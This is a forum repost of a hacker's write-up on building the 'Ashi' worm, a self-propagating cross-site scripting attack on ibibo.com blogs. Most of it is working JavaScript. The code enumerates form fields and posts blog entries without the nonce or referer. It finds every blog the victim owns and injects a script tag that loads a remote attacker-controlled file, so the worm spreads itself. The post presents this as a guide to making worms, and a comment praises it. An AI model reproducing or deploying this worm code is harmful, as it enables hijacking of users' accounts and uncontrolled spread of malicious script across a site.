• Demystifying The Ashi virus--"vinnu"

    Ashi Virus was developed by "vinnu" bhai last year. It was a perfect example of a self propogating virus. Let me post here his original paper. It will give us better view on making worms/virus and also their capabilities.

    Vulnerability:- I found several XSS vulnerabilities in ibibo.com. Next, i searched for any good point which can give me a point to autmate the leveraging process. I found two php pages post.php and new-post.php, which can submit my blog posts and bothe the title as well as the content were prone to XSS. So i developed a script to find out the form elements:

    javascript:var vin=document.getElementsByTagName("form")[0];var nunnu;for(var iter=0;iter<vin.length;iter++){if(iter==0){nunnu=v in.item(iter).name+"="+vin.item(iter).value;}else{ nunnu+="&"+vin.item(iter).name+"="+vin.item(iter). value;}}alert(nunnu);

    The above script retrieves the form elements and their values.So now i had the script (you have to alter above script a little to increase the form index to a suitable value to reach the target form as:

    javascript:var vin=document.getElementsByTagName("form")[2];var nunnu;for(var iter=0;iter<vin.length;iter++){if(iter==0){nunnu=v in.item(iter).name+"="+vin.item(iter).value;}else{ nunnu+="&"+vin.item(iter).name+"="+vin.item(iter). value;}}alert(nunnu);

    Paste above script in address-bar of the browser when the "http://blogs.ibibo.com/<your-blog>/wp-admin/"
    Page will open. I wrote "Namaste" in title & "Hows the life there" in content box. It gave me following in a dialogue
    box:
    post_title=Namaste&content=Hows the life there&tags_input=&action=post-quickpress-save&quickpress_post_ID=0
    &_wpnonce=3a7721d78d&_wp_http_referer=/vulnerable/wp-admin/&save=Save Draft&=Cancel&publish=Publish

    It seems like they are checking the referer (_wp_http_referer)and a nonce [_wpnonce] (well nonce is always the same everytimeI tried to post).But still the nonce appears in a page which cannot be directly XSSed. So i just tried to post the request without the referer and nonce.

    javascript:blog(); function blog(){var nunnu="><scr"+"ipt language=javascript"+"src='http://sites.google.com/site/urcontrolledsite/ibibo.js'>"+"<scr"+"ipt>";quote="Sahdi bhasa sahdi jaan hai ji, tusaan sunhsaa...";varblpayload="post_title="+quote;alert (nunnu);blpayload+=encodeURIComponent(nunnu);bl
    payload+="&content=Jaijeya";blpayload+=encodeURICo mponent(nunnu);blpayload+="hor&t
    ags_input=&action=post-quickpresssave&
    quickpress_post_ID=0&_wpnonce=&_wp_http_referer=&s ave=Save
    %20Draft&=Cancel&publish=Publish";alert(blpayload) ;ajaxPSLV("http://blogs.ibibo.co
    m/vulnerable/wp-admin/post.php",blpayload);}function ajaxPSLV(url, payload)
    { alert("url:\t"+url+"\npayload:\n"+payload);var xmlhttp; if
    (window.XMLHttpRequest) {xmlhttp = new XMLHttpRequest(); }else if
    (window.ActiveXObject) {try {xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");}
    catch (e) { try {xmlhttp = new
    ActiveXObject("Msxml2.XMLHTTP");} catch (e) { return;}
    } } alert("sending");xmlhttp.open("POST", url,
    true);xmlhttp.setRequestHeader("Content-Type", "application/x-www-formurlencoded");
    xmlhttp.setRequestHeader("Content-length",
    payload.length);alert("sending:\t"+payload.length) ;xmlhttp.send(payload);alert("se
    nt");}alert("done");

    It worked and it posted the blog even without the nonce and referer defined in querystring. But there is a problem.
    The script is appearing on the heading and also I wanted the script to post a different topic everytime it gets executed so i introduced the well known following circuit for chosing one of strings out of a list:

    var no=Math.floor(Math.random()*10);
    var quote=new Array(10);
    quote[0]="Sahdi bhasa sahdi jaan...";
    quote[1]="Don't you think we can...";
    quote[2]="Thats the attitude...Keep it up.";
    quote[3]="Intelligent?..";
    quote[4]="Main koi machine thodi hai...";
    quote[5]="Jaijeya ji! Theek hainn na?...";
    quote[6]="Veero! Tusaan Eh bhi parhi leya";
    quote[7]="Himachal a heaven...";
    quote[8]="Free Tibet...";
    quote[9]="Pahari (Kangri) dialoge must be respected and registered as a
    language...";
    var blpayload="post_title="+quote[no];

    After assembling it with above script i got the following code:

    javascript:blog();
    function blog(){
    var nunnu="><scr"+"ipt language=javascript"+"
    src='http://sites.google.com/site/urcontrolledsite/ibibo.js'>"+"</scr"+"ipt><a
    href=\"\" onmouseover=javascript:blog();>Jaijeya</a><a ";
    var no=Math.floor(Math.random()*10);
    var quote=new Array(10);
    quote[0]="Sahdi bhasa sahdi jaan...";
    quote[1]="Don't you think we can...";
    quote[2]="Thats the attitude...Keep it up.";
    quote[3]="Intelligent?..";
    quote[4]="Main koi machine thodi hai...";
    quote[5]="Jaijeya ji! Theek hainn na?...";
    quote[6]="Veero! Tusaan Eh bhi parhi leya";
    quote[7]="Himachal a heaven...";
    quote[8]="Free Tibet...";
    quote[9]="Pahari (Kangri) dialoge must be respected and registered as a
    language...";
    var blpayload="post_title="+quote[no];
    blpayload+=encodeURIComponent(nunnu);
    blpayload+="&content=Jaijeya</p></div";
    blpayload+=encodeURIComponent(nunnu);
    blpayload+="hor&tags_input=&action=post-quickpresssave&
    quickpress_post_ID=0&_wpnonce=&_wp_http_referer=&s ave=Save
    %20Draft&=Cancel&publish=Publish";
    alert(blpayload); ajaxPSLV("http://blogs.ibibo.com/vulnerable/wpadmin/
    post.php",blpayload);
    } function ajaxPSLV(url, payload) {
    alert("url:\t"+url+"\npayload:\n"+payload);
    var xmlhttp; if (window.XMLHttpRequest){
    xmlhttp = new XMLHttpRequest();} else if (window.ActiveXObject){
    try{xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");}catch(e){
    try{xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");}catch(e){
    return;}}}alert("sending");xmlhttp.open("POST", url, true);
    xmlhttp.setRequestHeader("Content-Type","application/x-www-formurlencoded");
    xmlhttp.setRequestHeader("Content-length", payload.length);
    alert("sending:\t"+payload.length);
    xmlhttp.send(payload);alert("sent");
    }alert("done");

    But i don't want my worm to just post in a hardcoded blog. It must search for all the blogs of the user and inject the posts as the above post did.To do this i have to check hrefs of all the anchors. Because The blog names are appearing within the page and when we click on any one the respective blog changes.

    javascript:var vin=document.getElementsByTagName("a");var nunn="";for(var i=0;i<vin.length;i++){nunn+=vin[i].href+"\n";}alert(nunn);

    But there are also several other items along with blogs.So my virus must identify the blogs out of other objects.
    I checked the pattern.After a careful inspection, I found that the hrefs which has wp-admin in their href are the references of blogs of the user. So i developed another script to check and it:

    javascript:test();
    function test() {
    var list="";
    var vin=document.getElementsByTagName("a");
    var total=0;var index=0;var address;
    var intex=0;
    for(var iter=0;iter<vin.length;iter++){
    if((index=vin[iter].href.indexOf("wp-admin"))!=-1){
    address=vin[iter].href.substring(0,index+8)+"/post.php";
    list += address+"\n";intex++;
    }}alert(intex+"\n"+list);}

    Now, i have got a way to identify the blogs out of other objects and post the random topics.By combining these all a beast started to take the shape as:

    javascript:trigger();
    function trigger() {
    var vin=document.getElementsByTagName("a");
    var total=0;var index=0;var address;
    for(var iter=0;iter<vin.length;iter++){
    if((index=vin[iter].href.indexOf("wp-admin"))!=-1){
    address=vin[iter].href.substring(0,index+8)+"/post.php";
    blog(address);
    }}}
    function blog(addr){
    var nunnu="><scr"+"ipt language=javascript"+"
    src='http://sites.google.com/site/urcontrolledsite/ibibo.js'>"+"</scr"+"ipt><a
    href=\"\" onmouseover=javascript:blog();>Jaijeya</a><a ";
    var no=Math.floor(Math.random()*10);
    var quote=new Array(10);
    quote[0]="Sahdi bhasa sahdi jaan...";
    quote[1]="Don't you think we can...";
    quote[2]="Thats the attitude...Keep it up.";
    quote[3]="Intelligent?..";
    quote[4]="Main koi machine thodi hai...";
    quote[5]="Jaijeya ji! Theek hainn na?...";
    quote[6]="Veero! Tusaan Eh bhi parhi leya";
    quote[7]="Himachal a heaven...";
    quote[8]="Free Tibet...";
    quote[9]="Pahari (Kangri) dialoge must be respected and registered as a
    language...";
    var blpayload="post_title="+quote[no];
    blpayload+=encodeURIComponent(nunnu);
    blpayload+="&content=Jaijeya</p></div";
    blpayload+=encodeURIComponent("><"+"sc"+"ript language=javascript>var
    ashi='"+nunnu+"';eval(ashi);<"+"/sc"+"ript>");
    blpayload+="hor&tags_input=&action=post-quickpresssave&
    quickpress_post_ID=0&_wpnonce=&_wp_http_referer=&s ave=Save
    %20Draft&=Cancel&publish=Publish";
    alert(blpayload); ajaxPSLV(addr,blpayload);
    }
    function ajaxPSLV(url, payload) {
    alert("url:\t"+url+"\npayload:\n"+payload);
    var xmlhttp; if (window.XMLHttpRequest){
    xmlhttp = new XMLHttpRequest();} else if (window.ActiveXObject){
    try{xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");}catch(e){
    try{xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");}catch(e){
    return;}}}alert("sending");xmlhttp.open("POST", url, true);
    xmlhttp.setRequestHeader("Content-Type","application/x-www-formurlencoded");
    xmlhttp.setRequestHeader("Content-length", payload.length);
    alert("sending:\t"+payload.length);
    xmlhttp.send(payload);alert("sent");
    };

    But i thought the title was not a good place to inject the code as it will appear in dashboard. So I placed the code in the argument of post.php named "content" instead of "post_title".The variable "nunnu" contains the code for a script which retrieves the remote javascript file at:
    http://sites.google.com/site/urcontrolledsite/ibibo.js
    This article was originally published in blog: Demystifying The Ashi virus--"vinnu" started by prashant_uniyal
    Comments 1 Comment
    1. soul301's Avatar
      soul301 -
      great .. awesome work.. nice and hatts off to u guys
  • G4H Facebook

  • G4H Twitter